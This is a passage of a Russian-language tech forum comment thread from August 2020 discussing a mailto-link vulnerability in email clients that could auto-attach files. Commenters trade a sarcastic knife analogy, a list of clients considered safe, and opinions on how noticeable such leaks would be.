    У кухоных ножей есть опасная уязвимость - если злоумышленник ударит им человека, то человек получит серьёзную травму и даже может умереть. Почему производители ножей не устраняют эту уязвимость? Существующие сейчас правила безопасности - это лишь набор костылей, которые не дают должной защиты. Ведь любой может идти по улице и не заметить подкравшегося сзади злоумышленника.
     
     
  • 2.93, Firecat (ok), 18:23, 20/08/2020 [^] [^^] [^^^] [ответить]  
  • +/
    Вообще-то кухонный нож плох для таких целей, у него очень слабая проникающая способность по сравнению с боевыми и охотничьими ножами... Короче, уязвимость устранена до максимума возможного.
     

  • 1.91, microsoft (?), 13:04, 20/08/2020 [ответить] [﹢﹢﹢] [ · · · ]  
  • +/
    Ура mutt выстоял, жаль сцраные html письма не переваривает
     
  • 1.92, Firecat (ok), 18:13, 20/08/2020 [ответить] [﹢﹢﹢] [ · · · ]  
  • –2 +/
    Короче, безопасные клиенты;
    Windows: W10 Mail, The Bat!
    Linux: Trojitá, Mutt
    macOS: Airmail
    iOS: Mail App
    Android: K-9 Mail, MailDroid
     
  • 1.98, economist (?), 23:39, 20/08/2020 [ответить] [﹢﹢﹢] [ · · · ]  
  • +1 +/
    Щелкая по email - юзер хочет слать письмо, и должен быть уже настороже.

    О том что вложились файлы - должно быть хорошо заметно в интерфейсе.

    А что это секретные файлы - скажет расширение (в Thunderbird).

    В нем же расширения говорят что получатель - из другого домена.

    Наверно автоматом вкладывать файлы - не лучшая идея для протокола на обычный клик, но каких-то серьезных утечек - скорее всего не было.

     

     Добавить комментарий
    Имя:
    E-Mail:
    Текст:



    Спонсоры:
    Inferno Solutions
    Hosting by Hoster.ru
    Хостинг:

    Закладки на сайте
    Проследить за страницей
    Created 1996-2020 by Maxim Chirkov
    Добавить, Поддержать, Вебмастеру